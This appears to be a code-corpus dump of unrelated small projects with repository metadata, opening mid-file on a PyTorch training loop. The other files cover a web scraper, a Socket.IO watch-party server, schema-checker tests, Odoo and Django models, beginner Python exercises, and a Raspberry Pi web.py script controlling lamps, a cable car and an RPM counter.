# Loss and Accuracy within the epoch
train_loss = 0.0
train_acc = 0.0
valid_loss = 0.0
valid_acc = 0.0
for i, (inputs, labels) in enumerate(train_data_loader):
# inputs = inputs.float()
inputs = inputs.to(device)
labels = labels.to(device)
# Clean existing gradients
optimizer.zero_grad()
# Forward pass - compute outputs on input data using the model
outputs = model(inputs)
# Compute loss
loss = loss_criterion(outputs, labels)
# Backpropagate the gradients
loss.backward()
# Update the parameters
optimizer.step()
# Compute the total loss for the batch and add it to train_loss
train_loss += loss.item() * inputs.size(0)
# Compute the accuracy
ret, predictions = torch.max(outputs.data, 1)
correct_counts = predictions.eq(labels.data.view_as(predictions))
# Convert correct_counts to float and then compute the mean
acc = torch.mean(correct_counts.type(torch.FloatTensor))
# Compute total accuracy in the whole batch and add to train_acc
train_acc += acc.item() * inputs.size(0)
# print("Batch number: {:03d}, Training: Loss: {:.4f}, Accuracy: {:.4f}".format(i, loss.item(), acc.item()))
# Validation - No gradient tracking needed
with torch.no_grad():
# Set to evaluation mode
model.eval()
# Validation loop
for j, (inputs, labels) in enumerate(valid_data_loader):
inputs = inputs.to(device)
labels = labels.to(device)
# Forward pass - compute outputs on input data using the model
outputs = model(inputs)
# Compute loss
loss = loss_criterion(outputs, labels)
# Compute the total loss for the batch and add it to valid_loss
valid_loss += loss.item() * inputs.size(0)
# Calculate validation accuracy
ret, predictions = torch.max(outputs.data, 1)
correct_counts = predictions.eq(labels.data.view_as(predictions))
# Convert correct_counts to float and then compute the mean
acc = torch.mean(correct_counts.type(torch.FloatTensor))
# Compute total accuracy in the whole batch and add to valid_acc
valid_acc += acc.item() * inputs.size(0)
#print("Validation Batch number: {:03d}, Validation: Loss: {:.4f}, Accuracy: {:.4f}".format(j, loss.item(), acc.item()))
# Find average training loss and training accuracy
avg_train_loss = train_loss/len(train_data_set)
avg_train_acc = train_acc/len(train_data_set)
# Find average validation loss and training accuracy
avg_valid_loss = valid_loss/len(valid_data_set)
avg_valid_acc = valid_acc/len(valid_data_set)
training_metrics.append([avg_train_loss, avg_valid_loss, avg_train_acc, avg_valid_acc])
epoch_end = time.time()
print("Epoch : {:03d}/{} : [Training: Loss: {:.4f}, Accuracy: {:.4f}%] [Validation : Loss : {:.4f}, Accuracy: {:.4f}%] [Time: {:.4f}s]".format(epoch, epochs, avg_train_loss, avg_train_acc*100, avg_valid_loss, avg_valid_acc*100, epoch_end-epoch_start))
end_time = datetime.datetime.now()
total_training_time = end_time-start_time
print ('Total training time = '+ str(total_training_time))
return model, training_metrics
def model_inference(model, input_image_path, trans=transforms.Compose([transforms.ToTensor()])):
'''
Performs Inference on a selected image using a trained model.
Inputs:
Model: [PyTorch Model] Trained neural network.
input_image_path: [str] path to target DICOM image
trans: [pytorch transforms] pytroch transforms to be performed on the dataset.
Outputs:
'''
if input_image_path.endswith('dcm'):
target_img = dicom_to_pil(input_image_path)
else:
target_img = Image.open(test_image_name).convert('RGB')
target_img_tensor = trans(target_img)
target_img_tensor = target_img_tensor.unsqueeze(1)
with torch.no_grad():
model.to('cpu')
target_img_tensor.to('cpu')
model.eval()
out = model(target_img_tensor)
# ps = torch.exp(out)
ps=out
prediction_percentages = (ps.cpu().numpy()[0]).tolist()
pred = prediction_percentages.index(max(prediction_percentages))
return (pred, max(prediction_percentages))
##
| [
"elbanan@users.noreply.github.com"
] | elbanan@users.noreply.github.com |
d10573b862a65a0fa585fef8597f971ce8d98620 | 05f24247db7c9f0ce7d7fc7f413ba5dbd65fae83 | /Web_crawler/Web_Crawler.py | 2bfab58800c557cfa6ff65d7c4008b8b31d6dfbb | [] | no_license | metal32/Algorithm | eb486df62bd7857f0959a5c2100f8225d37cad98 | 7955f0c448cf69a7ff3474e9a5e579a33c936aa2 | refs/heads/master | 2021-01-21T05:05:16.893701 | 2017-03-18T02:03:38 | 2017-03-18T02:03:38 | 83,125,121 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,279 | py | '''
Created on 18-Mar-2017
@author: ayush
'''
import requests
from bs4 import BeautifulSoup
import webbrowser
import re
def removeComments(string):
string = re.sub(re.compile("<.*?>",re.DOTALL ) ,"" ,string) # (<--COMMENT -->) from string
string = re.sub(re.compile("--->.*?",re.DOTALL ) ,"" ,string)
return string
def trade_spider(maxpages):
page=1
dict={}
desc={}
while page<=maxpages:
url='http://cyro.se/tvseries/index.php?&page='+str(page)
sourcecode=requests.get(url)
plain_text=sourcecode.text
soup=BeautifulSoup(plain_text)
for link in soup.find_all('td',{'class':'topic_content'}):
href='http://cyro.se/tvseries/'+link.find('a')['href']
name=link.find('a')['href'].split('-')
title=' '.join(map(str,name[2:]))
print title
descr=link.find('div',{'class':'imgWrap'}).renderContents()
final_descr= removeComments(descr).strip()
print final_descr
print 'The link for visiting the Tv-series is given below'
print href
print '\n\n'
dict[title]=href
desc[title]=final_descr
page+=1
return dict,desc
dict,desc= trade_spider(3)
print dict.keys() | [
"ayus097836@gmail.com"
] | ayus097836@gmail.com |
6027cfd9f560f466afa4aa586c1d2c4e8d252768 | 2ff18a1fc1df5b9d81e4568694110f776d57aada | /anaconda_env/webapp/bin/sphinx-apidoc | fb5df790c6f30de0bb21c16ff5385ab5af4fe5c9 | [] | no_license | tacNakadai/my1stDjango | 318ea813956c3d2da1313e1771b4d92397796449 | 004d04fae8ea4d53ebe499a513e8fb50ebd7ae0d | refs/heads/master | 2022-10-17T13:39:02.211063 | 2017-08-20T06:21:12 | 2017-08-20T06:21:12 | 100,841,395 | 0 | 1 | null | 2022-10-05T21:30:46 | 2017-08-20T05:49:10 | Python | UTF-8 | Python | false | false | 156 | #!/Users/tac_nakadai/anaconda/envs/webapp/bin/python
if __name__ == '__main__':
import sys
import sphinx.apidoc
sys.exit(sphinx.apidoc.main())
| [
"tac.nakadai@me.com"
] | tac.nakadai@me.com | |
e20d0df92b8c34eda198bef61f110eae0f111527 | bf365949bcfe5a62bf11bc86d37b3caf27115f24 | /src/backend/main.py | 127580b39163fec80da870b8bb3227d63b7b642c | [
"MIT"
] | permissive | jcentauri/WatchTogether | 4895660615fa64596959a2fbbe1951793c3c3c43 | 56ce93c9d1bfe1066817efb8cd9ecc1bd95d468e | refs/heads/master | 2020-12-10T07:35:46.110423 | 2020-01-14T07:16:45 | 2020-01-14T07:16:45 | 233,536,813 | 0 | 0 | MIT | 2020-01-13T07:29:40 | 2020-01-13T07:29:39 | null | UTF-8 | Python | false | false | 2,369 | py | import html
from datetime import datetime
import socketio
sio = socketio.Server()
connections = []
usernames = {}
roomusers = {}
@sio.on('connect')
def connect(sid, environ):
# print('connect ', sid, '', environ)
print('connect ', sid)
connections.append(str(sid))
print('connected sockets: ', len(connections))
@sio.on('join room')
def join_room(sid, roomnum, username="Unknown"):
for room in sio.rooms(sid):
sio.leave_room(sid, room)
usernames[str(sid)] = html.escape(str(username))
sio.enter_room(sid, roomnum)
room = str(sio.rooms(sid)[0])
if type(roomusers.get(room)) == list:
roomusers[room].append(usernames.get(str(sid), "Unknown"))
else:
roomusers[room] = []
roomusers[room].append(usernames.get(str(sid), "Unknown"))
data = roomusers.get(room)
sio.emit('get users', data, room=room)
@sio.on('send message')
def send_message(sid, message):
data = {
"user": usernames.get(str(sid)),
"msg": html.escape(message),
"time": datetime.utcnow().strftime("%Y-%m-%d %H:%M:%S UTC"),
}
sio.emit('new message', data, room=sio.rooms(sid)[0])
@sio.on('play video')
def play_video(sid, data):
room = str(sio.rooms(sid)[0])
data = {
"state": data.get("state", ""),
}
sio.emit('play video client', data, room=room)
@sio.on('sync video')
def sync_video(sid, data):
room = str(sio.rooms(sid)[0])
data = {
"time": data.get("time"),
"state": data.get("state"),
"videoId": data.get("videoId"),
}
sio.emit('sync video client', data, room=room)
@sio.on('change video')
def change_video(sid, data):
room = str(sio.rooms(sid)[0])
data = {
"videoId": data.get("videoId"),
}
sio.emit('change video client', data, room=room)
@sio.on('')
def fname(sid):
pass
@sio.on('')
def fname(sid):
pass
@sio.on('disconnect')
def disconnect(sid):
room = str(sio.rooms(sid)[0])
if room in roomusers:
roomusers[room].remove(usernames.get(str(sid)))
sio.emit('get users', roomusers.get(room), room=room)
for uroom in sio.rooms(sid):
sio.leave_room(sid, uroom)
if str(sid) in usernames:
del(usernames[str(sid)])
connections.remove(str(sid))
print('disconnect ', sid)
print('connected sockets: ', len(connections))
| [
"maik@maik.dev"
] | maik@maik.dev |
413bdf4b551bce587c18a97aa35b487551e703a6 | f255423c6a1edd99a37d8b9d66ee481283409fc8 | /vaip/tests/checker.py | aa42f9bb834ce7bf0a043122c8f1572229ecc43e | [
"MIT"
] | permissive | dacav/vaip | d7cf7e9c2c103d9bf842f8b84075e85796c831e2 | 5d0805fa72f27a6510ab4eef5cbc6fd419831e9a | refs/heads/master | 2021-05-07T08:39:40.057226 | 2015-05-21T14:26:23 | 2015-05-21T14:26:23 | 109,367,693 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,457 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# --- Battery included modules -------------------------------------------
import unittest as ut
# --- Locally installed modules -----------------------------------------
# --- Program internal modules -------------------------------------------
from vaip import (
checker,
errors,
)
# ------------------------------------------------------------------------
class Tests(ut.TestCase):
@classmethod
def setUpClass(clz):
clz.ck = checker.Checker('''
type uid : string matching /^[0-9a-f]+$/;
entry type user : (
uid : uid,
name : string optional,
age : int(0, *) optional,
geek : bool optional
);
entry type counters : array (*, 9) of real (0, 1)
''')
def test_noentry(self):
with self.assertRaises(errors.UnboundTypeError):
Tests.ck['uid']
def test_optional_nested_match(self):
user_ck = Tests.ck.user
with self.assertRaises(errors.InputError):
user_ck(dict(name = 'lol')) # No uid
with self.assertRaises(errors.InputError):
user_ck(dict(uid = 100))
with self.assertRaises(errors.InputError):
user_ck(dict(uid = 'fudge'))
user_ck(dict(uid = 'fde'))
def test_int_range(self):
user_ck = Tests.ck.user
info = dict(
uid = '91024abc',
age = 100,
)
user_ck(info)
info['age'] = -1
with self.assertRaises(errors.InputError):
user_ck(info)
def test_bool(self):
user_ck = Tests.ck.user
info = dict(
uid = '91024abc',
geek = True
)
user_ck(info)
info['geek'] = 1
with self.assertRaises(errors.InputError):
user_ck(info)
info['geek'] = False
user_ck(info)
def test_array_real(self):
counters_ck = Tests.ck.counters
info = [0.1, 0.2, 0.3] * 3
counters_ck(info)
info.append(0.1)
with self.assertRaises(errors.InputError):
counters_ck(info)
info.pop()
info[-1] = 1.1
with self.assertRaises(errors.InputError):
counters_ck(info)
info.pop()
counters_ck(info)
info.append('hello')
with self.assertRaises(errors.InputError):
counters_ck(info)
def test_array_length(self):
counters_ck = Tests.ck.counters
info = [0.1, 0.2, 0.3] * 3
counters_ck(info)
info.append(0.1)
class TestTrace(ut.TestCase):
@classmethod
def setUpClass(clz):
clz.ck = checker.Checker('''
entry type pong : array(0,10) of real(14,14.5);
type sub_bar : (
pong : pong
);
entry type deep : (
sub : (
sub : (
foo : int(0, 1),
bar : sub_bar optional
)
)
);
entry type shallow : array (0, 1) of deep
''')
def verify(self, how, data, exp_trace, exp_message):
try:
how(data)
except errors.InputError as e:
trace = e.trace
message = str(e)
else:
assert False, 'No exception?'
self.assertListEqual(exp_trace, trace)
self.assertIn(exp_message, message)
def test_shallow(self):
self.verify(
TestTrace.ck.shallow,
dict(foo=3),
[], 'Expected list or tuple'
)
def test_pong(self):
tocheck = [14.0, 14.1, 14.2, 14.6, 14.4]
self.verify(
TestTrace.ck.pong,
tocheck,
[3], 'Invalid x=14.6: required 14 <= x <= 14.5'
)
tocheck[3] = 14 # Not a float, still ok
TestTrace.ck.pong(tocheck)
self.verify(
TestTrace.ck.pong,
tocheck * 3, # Size beyond array boundary.
[], 'Invalid x=15: required 0 <= x <= 10'
)
def test_deep(self):
tocheck = dict()
self.verify(TestTrace.ck.deep, tocheck,
[], 'Missing non-optional field \'sub\''
)
tocheck['sub'] = dict()
self.verify(TestTrace.ck.deep, tocheck,
['sub'], 'Missing non-optional field \'sub\''
)
tocheck['sub']['sub'] = dict()
self.verify(TestTrace.ck.deep, tocheck,
['sub', 'sub'], 'Missing non-optional field \'foo\''
)
tocheck['sub']['sub']['foo'] = 'hello'
self.verify(TestTrace.ck.deep, tocheck,
['sub', 'sub', 'foo'], "Type of 'hello': expecting int, got <class 'str'>"
)
tocheck['sub']['sub']['foo'] = 99
self.verify(TestTrace.ck.deep, tocheck,
['sub', 'sub', 'foo'], 'Invalid x=99: required 0 <= x <= 1'
)
tocheck['sub']['sub']['foo'] = 1
TestTrace.ck.deep(tocheck)
tocheck['sub']['sub']['bar'] = '12'
self.verify(TestTrace.ck.deep, tocheck,
['sub', 'sub', 'bar'], 'Not a mapping'
)
tocheck['sub']['sub']['bar'] = dict(
pong=[14.0, 14.1, 14.2, 14.9]
)
self.verify(TestTrace.ck.deep, tocheck,
['sub', 'sub', 'bar', 'pong', 3],
'Invalid x=14.9: required 14 <= x <= 14.5'
)
| [
"simgidacav@gmail.com"
] | simgidacav@gmail.com |
f013f19660f721d18499c7b32f7f3c887255dbba | dc08b638bc77f80f3701c3266c61bb8e4b13eed1 | /wakf_movable_property.py | 8e6b8347e4f7e46d4dfce74ad69d56701ce6b31e | [] | no_license | wasimmoosa/wakf_registration | 109c53a2291fdaf23663712e74b7a4b6b27fbf06 | eb8e600a8fb4949ebb6a801f52824e76a24b7bb4 | refs/heads/master | 2020-05-29T11:04:45.948382 | 2014-09-09T03:36:03 | 2014-09-09T03:36:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,680 | py | from osv import osv
from osv import fields
class wakf_movableproperty(osv.osv):
"""
Open ERP Model
"""
_name = 'wakf.movableproperty'
_description = 'wakf.movableproperty'
_columns = {
'wakf_id':fields.many2one('res.partner','Wakf Name',ondelete='set null'),
'name':fields.char('Name', size=128, required=True),
'property_nature_id':fields.many2one('wakf.property_nature','Property Nature',ondelete='set null'),
'expiry_date':fields.date('Expiry Date',required=False),
'property_assessment':fields.selection((('income','Assessable Property (Income generating)'), ('non-income','Not Assessable Property (Non-Income generating)')),'Property Assessment',required=True),
'reference_no':fields.char('Reference No',size=8,required=False),
'value':fields.float('Estimated Value',required=False),
'valuation_date':fields.date('Valuation Date',required=False),
'location_property':fields.text('Location',required=True),
'property_additional_details':fields.text('Additional Info',required=False),
'property_remarks':fields.text('Remarks',required=False),
}
wakf_movableproperty()
class wakf_property_nature(osv.osv):
_name='wakf.property_nature'
_description='wakf.property_nature'
_columns = {
'name':fields.char('Name', size=64, required=True),
'description':fields.text('Description',required=False),
}
wakf_property_nature()
| [
"hashir.haris@gmail.com"
] | hashir.haris@gmail.com |
0bf6dccc5d8cccda86f91104420aac8eef269d66 | 6f528583d9738cd793b8efbbc4749f5ce049c833 | /01_ultrabasic2_types.py | 29cdb9342e14248d6d0ba475ad6d5a7312359392 | [
"Apache-2.0"
] | permissive | steffenerickson/humanitiesTutorial | f554ab661ce5746df83f0106fae4e14e29df951e | cdac8c381f13d740503237ee91c8969be812e6d4 | refs/heads/master | 2022-04-17T19:26:55.494473 | 2018-10-26T13:56:31 | 2018-10-26T13:56:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 261 | py | # The basic data types in Python
# String:
"This is a string"
'This is also a string'
# Integer
1
2
100000
824825
# Float
1.0
2.0
3.14159
-120.3
# Boolean
True
False
# Nonetype
None # This evaluates to False
# This prints to console
print("hello, world") | [
"p.a.vierthaler@hum.leidenuniv.nl"
] | p.a.vierthaler@hum.leidenuniv.nl |
dca151750953a879a4d51fc7b10ce4e4b724f263 | 84aa6f90e5cf5f2e49a9488c1768f2794cbd50db | /student/101022126/HW2/chaos.py | 8fe9c8a917b02d53f2ed509b34618c3ee9470841 | [] | no_license | u101022119/NTHU10220PHYS290000 | c927bf480df468d7d113e00d764089600b30e69f | 9e0b5d86117666d04e14f29a253f0aeede4a4dbb | refs/heads/master | 2021-01-16T22:07:41.396855 | 2014-06-22T11:43:36 | 2014-06-22T11:43:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 363 | py | # -*- coding: utf-8 -*-
"""
Created on Thu May 01 13:17:59 2014
@author: Administrator
"""
L = 1000
r = 1
xlist = []
rlist = []
while r <= 4:
rlist.append(r)
x = 0.5
n = 0
while n < L:
x = r * x * (1-x)
n += 1
xlist.append(x)
r = r + 0.01
print xlist
import matplotlib.pyplot as plt
plt.figure()
plt.plot(rlist,xlist) | [
"s101022126@m101.nthu.edu.tw"
] | s101022126@m101.nthu.edu.tw |
bc11f0e21b86f30cf0b8b0dc4ead10fa67491128 | d45afbb7357a58480baa6fa37a9b412160ff517d | /example/dexterity/page.py | 308acbe2fca7f8723cbef940fd06fbb5c2e0270e | [] | no_license | collective/example.dexterity | 13c179554809905d634b4b23cd335072960cedf0 | bfffcdb490b67f48193b1366b89c971736770893 | refs/heads/master | 2023-03-22T11:29:40.313035 | 2011-04-29T23:25:49 | 2011-04-29T23:25:49 | 2,419,281 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,087 | py | """This interface is used by the example.schemapage type. The interface
below is "real", and you can register views and adapters for it. It
will be populated with schema fields read from page.xml in this
directory when the package is grokked.
It is possible to amend/customise the interface with new fields in addition
to those found in the model file, although without a class we normally can't
promise new methods.
We also register a custom view, called @@view. The template for this is found
in page_templates/view.pt, because this module is called "page.py" and the
view class is called "View". We specify that it is a view for any IPage
(grok.context) and requires the View permission (grok.require).
"""
from five import grok
from plone.directives import form
class IPage(form.Schema):
form.model("models/page.xml")
# It is possible to add additional fields and methods can be added here
# if necessary. However, without a custom class, we usually can't
# promise new methods.
class View(grok.View):
grok.context(IPage)
grok.require('zope2.View') | [
"optilude@gmail.com"
] | optilude@gmail.com |
b763f4de500585543a11db4aab3254a452c4eceb | 4cf6c3788085972036f62719538f77c8ad0ffbec | /Django-Python VS/env/Scripts/django-admin.py | 62d9f52d057448054ae4ea0e5e2b040de9ad1852 | [] | no_license | Denis-project/Python-Django-VS | fd87e81955867982020b6fa461d30a2a8dd9aab4 | 9654ad65ee7cc62f978226a31b6c2eac5314287b | refs/heads/master | 2023-02-02T11:21:50.566209 | 2020-11-15T10:24:56 | 2020-11-15T10:24:56 | 307,746,135 | 1 | 0 | null | 2020-12-14T17:21:54 | 2020-10-27T15:33:04 | JavaScript | UTF-8 | Python | false | false | 182 | py | #!D:\Django-Python\Django-Python VS\Django-Python VS\env\Scripts\python.exe
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
| [
"xapples.size@gmail.com"
] | xapples.size@gmail.com |
fea2b58017d84e678eb253c34a82de3e34008733 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2618/60760/320379.py | 98f57acd02e0cec08c8c13985ad1816e3642c974 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 17 | py | print(1)
print(2) | [
"1069583789@qq.com"
] | 1069583789@qq.com |
20acb60db8694a66ca1b7869ed35e2c28f6b586c | 550292bab2cfb4a727a683cd9c47e137473395a0 | /article/models.py | f9a40d3a30eafbe056e1030ae5bf7f609dfd5f3c | [] | no_license | ProgerB/NewsSite | e7bce3bd7e811867bb844759cd05b992cf92a125 | fadd2d65694f7d399bb6007b33634518dbc629b3 | refs/heads/master | 2023-01-24T23:40:58.185642 | 2020-12-08T14:22:24 | 2020-12-08T14:22:24 | 285,798,151 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,787 | py | from django.db import models
from ckeditor_uploader.fields import RichTextUploadingField
from django.utils.safestring import mark_safe
class Category(models.Model):
STATUS = (
('True', 'Mavjud'),
('False', 'Mavjud emas'),
)
title = models.CharField(max_length=50)
keywords = models.CharField(max_length=255, unique=True)
description = models.CharField(max_length=255)
status = models.CharField(max_length=15, choices=STATUS)
slug = models.SlugField()
create_at = models.DateTimeField(auto_now_add=True)
update_at = models.DateTimeField(auto_now=True)
def __str__(self):
return self.title
class Article(models.Model):
STATUS = (
('True', 'Mavjud'),
('False', 'Mavjud emas'),
)
category = models.ForeignKey(Category, on_delete=models.CASCADE)
author = models.CharField(max_length=255, blank=True)
title = models.CharField(max_length=50, unique=True)
keywords = models.CharField(max_length=255, unique=True)
description = RichTextUploadingField()
image = models.ImageField(blank=True, upload_to='images/')
status = models.CharField(max_length=15, choices=STATUS)
slug = models.SlugField()
create_at = models.DateTimeField(auto_now_add=True)
update_at = models.DateTimeField(auto_now=True)
def __str__(self):
return self.title
def image_tag(self):
return mark_safe('<img src ="{}" height="50">'.format(self.image.url))
image_tag.short_description = 'Image'
class Images(models.Model):
article = models.ForeignKey(Article, on_delete=models.CASCADE)
title = models.CharField(max_length=255, blank=True)
image = models.ImageField(blank=True, upload_to='images/')
def __str__(self):
return self.title
| [
"xurramovbahrom@mail.ru"
] | xurramovbahrom@mail.ru |
5af037b3c47d5183a68d74f33da7344d8416f2b3 | 7acd7abdef66c6569a26185d939b7438c1aae164 | /listoflists.py | bd4c0fb6d8e637d599410170ad939e96f66cfe37 | [] | no_license | gabriellechen-nyu/Python-INFO1-CE9990 | 3a2a5738862a6ad64920c92e8725546d592aae5c | 00dffa49bdd10ac83c897833b9fb52bcbfee80aa | refs/heads/master | 2020-04-05T14:08:06.572428 | 2017-08-12T16:16:06 | 2017-08-12T16:16:06 | 94,785,074 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,088 | py | """
listoflists.py
Gabrielle Chen
Homework 5
July 13, 2017
"""
import sys
import csv
import urllib.request
url = "https://data.cityofnewyork.us/api/views/xx67-kt59/rows.csv?accessType=DOWNLOAD"
try:
lines = urllib.request.urlopen(url)
except urllib.error.URLError as error:
print("urllib.error.URLError", error)
sys.exit(1)
restaurants = []
seen = set()
for line in lines:
try:
string = line.decode("utf-8")
except UnicodeError as unicodeError:
print(unicodeError)
sys.exit(1)
reader = csv.reader([string])
fields = next(reader)
date = fields[8].split("/")
if fields[14] == "Not Yet Graded" and date[2] == "2017" and fields[0] not in seen:
restaurants.append(fields)
seen.add(fields[0])
lines.close()
def score(line):
return line[1]
if len(restaurants)==0:
print("All restaurants have been graded in 2017")
else:
restaurants.sort(key=score)
for restaurant in restaurants:
print("{} - {} {}, {}".format(restaurant[1], restaurant[3], restaurant[4], restaurant[2]))
sys.exit(0)
| [
"noreply@github.com"
] | gabriellechen-nyu.noreply@github.com |
f769891c4dc77db751e1f6ea84e4314a12f1373f | bafc56f547e33ddaffbd338556fb0277938cf5b1 | /LAB4/prac42.py | 58a03d601efc56d9c8e748bc89c9554de0d48647 | [] | no_license | LazarusCoder/Problem_Solving_with_Python | 511a56fd7a76bcecbaec0c37073eeecb3385508c | c453f8f8e8f692c611b887e703a6d573921a75af | refs/heads/master | 2022-12-31T12:58:48.601469 | 2020-10-01T08:07:33 | 2020-10-01T08:07:33 | 265,870,343 | 0 | 2 | null | 2020-10-16T14:12:22 | 2020-05-21T14:30:33 | Python | UTF-8 | Python | false | false | 344 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Jan 13 15:20:02 2020
@author: Admin
"""
az=set("abcdefghijklmnopqrstuvwxyz")
getstr=input("Enter the String")
getstr=getstr.replace(" ","")
if((len(az)-len(set(getstr)))==0):
print("The String is Pangrams")
else:
print("The String is Not Pangrams" )
| [
"rudranshjani18@gnu.ac.in"
] | rudranshjani18@gnu.ac.in |
ed354666fd6dc1e0cae906c5773d39328b2816a1 | adb391d43e88ba3c1d7fe755f3876163874c3be4 | /Script.py | 0115695afaba164c4d2124b9fe68f053109b132c | [] | no_license | sundar1988/MasterThesis | 6b55e8eb41bdf358f9813b33c5d95d456a0899c6 | 1704c9eadc05dda65c400578d8a3f6bc87a2d119 | refs/heads/master | 2021-01-20T19:45:48.106382 | 2016-06-26T11:37:38 | 2016-06-26T11:37:38 | 61,986,119 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,150 | py | # -*- coding: utf-8 -*-
##------------------------
##Import
##------------------------
import web
#import sys
import RPi.GPIO as GPIO
import time
import drivePWM # this module is design to set PWM
#import pyfirmata
import time
#from Adafruit_I2C import Adafruit_I2C
#from time import sleep
#import math
##------------------------
##I2C device defination
##------------------------
##address = 0x49 #TSL2561
##i2c = Adafruit_I2C(address)
##control_on = 0x03
##control_off = 0x00
##------------------------
##Defination
##------------------------
##------------------------
##URL defination
##------------------------
urls = (
'/','Root',"/root2","root2",'(/.+)','root1'
)
##------------------------
##Set all GPIO
##------------------------
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
HALL_SENSOR = 23 #RPi pin
ROTARY_ENCODER=25 #RPi pin
GPIO.setup (HALL_SENSOR,GPIO.IN,pull_up_down=GPIO.PUD_DOWN)
GPIO.setup(ROTARY_ENCODER, GPIO.IN, pull_up_down=GPIO.PUD_UP)
##------------------------
##I2C Channel
##------------------------
FrontLampDown=0
FrontLampMid=1
FrontLampUp=2
LampRight=3
LampLeft=4
StreetLamp=5
CableCar=6
##------------------------
##Initialization
##------------------------
counter=0
MaxCounter=1000
rpmCount=-1
rpm=0
##------------------------
## URL handling
##------------------------
Script= web.application(urls, globals())
#render = web.template.render('template/')
##------------------------
##
##------------------------
class Root:
def __init__ (self):
self.hello = "hello world"
def GET(self):
INPUT= web.input(select="", setvalue="")
command= str (INPUT.select)
global deValue
deValue = int (INPUT.setvalue)
if command == "frontlampdown":
import LuxPWMfld
savedLux=LuxPWMfld.saveLux
pwmFLD = LuxPWMfld.selectLux(deValue)# deValue is required Lux
drivePWM.select(0,pwmFLD)
if pwmFLD !=0:
return 'Front Down lamp ON, with pwm value:',pwmFLD,'Lux Range:',savedLux[0],'to',savedLux[256]
else:
return "Front Down lamp OFF"
if command == "frontlampmid":
import LuxPWMflm
savedLux=LuxPWMflm.saveLux
pwmFLM = LuxPWMflm.selectLux(deValue)# deValue is required Lux
drivePWM.select(1,pwmFLM)
if pwmFLM !=0:
return 'Front Mid lamp ON, with pwm value:',pwmFLM,'Lux Range:',savedLux[0],'to',savedLux[256]
else:
return "Front Mid lamp OFF"
if command == "frontlampup":
import LuxPWMflu
savedLux=LuxPWMflu.saveLux
pwmFLU = LuxPWMflu.selectLux(deValue)# deValue is required Lux
drivePWM.select(2,pwmFLU)
if pwmFLU !=0:
return 'Front UP lamp ON, with pwm value:',pwmFLU,'Lux Range:',savedLux[0],'to',savedLux[256]
else:
return "Front UP lamp OFF"
if command == "lampright":
import LuxPWMlr
savedLux=LuxPWMlr.saveLux
pwmLR = LuxPWMlr.selectLux(deValue)# deValue is required Lux
drivePWM.select(3,pwmLR)
if pwmLR !=0:
return 'Right Lamp ON, with pwm value:',pwmLR,'Lux Range:',savedLux[0],'to',savedLux[256]
else:
return "Right Lamp OFF"
if command == "lampleft":
import LuxPWMll
savedLux=LuxPWMll.saveLux
pwmLL = LuxPWMll.selectLux(deValue)# deValue is required Lux
drivePWM.select(4,pwmLL)
if pwmLL !=0:
return 'Left lamp ON, with pwm value:',pwmLL,'Lux Range:',savedLux[0],'to',savedLux[256]
else:
return "Left lamp OFF"
if command == "streetlamp":
drivePWM.select(5,deValue)# here deValue is direct pulse (0..4096)
if deValue !=0:
return "Street Lamp ON,with PWM value %d" %deValue
else:
return "Street Lamp OFF"
##------------------------
##Cable Car
##-----------------------
# Hall sensor is used to detect the presence of the object
# add_event_detect function works on the multiple threading protocal
# MaxCounter is the required counter value inputed by user in web
# to give the value of 'MaxCounter' user must select ?turn=111
if command == "cablecar":
drivePWM.select(6,deValue)# here deValue is direct pulse (0..4096)
def my_callback(channel):
global counter
global MaxCounter
counter =counter+1
#print "count %d" %counter
if deValue != 0 and MaxCounter > 0:
MaxCounter=MaxCounter-1
drivePWM.select(6,deValue)
return "\n Cable Car running, with PWM speed %d" %deValue
else:
drivePWM.select(6,0)
return "\n Cable Car STOP"
GPIO.add_event_detect(HALL_SENSOR, GPIO.FALLING, callback = my_callback, bouncetime=300)
return "\n Cable Car running, with PWM speed %d" %deValue
# Input to the maximum counter
if command == "setcounter":
global MaxCounter
MaxCounter= deValue-1
GPIO.remove_event_detect (HALL_SENSOR)
drivePWM.select(6,0)
return "Maximum counter inputed: %d" %deValue
else:
return "No such device exist!! Type help."
class root1:
def GET(self, command1):
command1=str (command1)
# help section
if command1 == "/help":
import Help
return Help.script()
# read counter value
if command1 == "/getcountervalue":
global counter
return "counter value is %d" %counter
# new approach for RPM measurement from rotary encoder
# this is based on the event detection (multiple threading process)
# when this section is selected, the rpm count is being processed in the background
# variable rpm is updated in each 5 second
# updated variable 'rpm' is return to show the current RPM to the user via web
if command1 == "/startrpmcounter":
t0=time.time()
rpmCount=-1
def get_encoder_turn(channel):
global rpmCount
rpmCount=rpmCount+1
#print "rpm count %d"%rpmCount
return rpmCount
GPIO.add_event_detect(ROTARY_ENCODER, GPIO.BOTH, callback = get_encoder_turn)
x=0
while True:
t1=time.time()
if t1-t0>=5:#each 5 sec
global rpm
global rpmCount
x=get_encoder_turn(ROTARY_ENCODER)# each 5 second it calls get_encoder_turn function
y=x
x=0
rpmCount=-1
rpm=(y/48) #(y/48)*(60/5) --1 revolution is equal to 48 increment.
#(24 pulse per 360 degree)
#print "The motor RPM is:",rpm
t0=t1
if command1 == "/getrpm":
global rpm
return "rpm: %f " %rpm
if command1 == "/getspeed":
global rpm
speed = 2*3.14159*3*(float(rpm)/60)# 2*PI*radius in cm*rps (speed in cm/second)
return "speed: %f" %speed
if command1 == "/resetrpm":
global rpm
rpm=0
#GPIO.remove_event_detect (21)
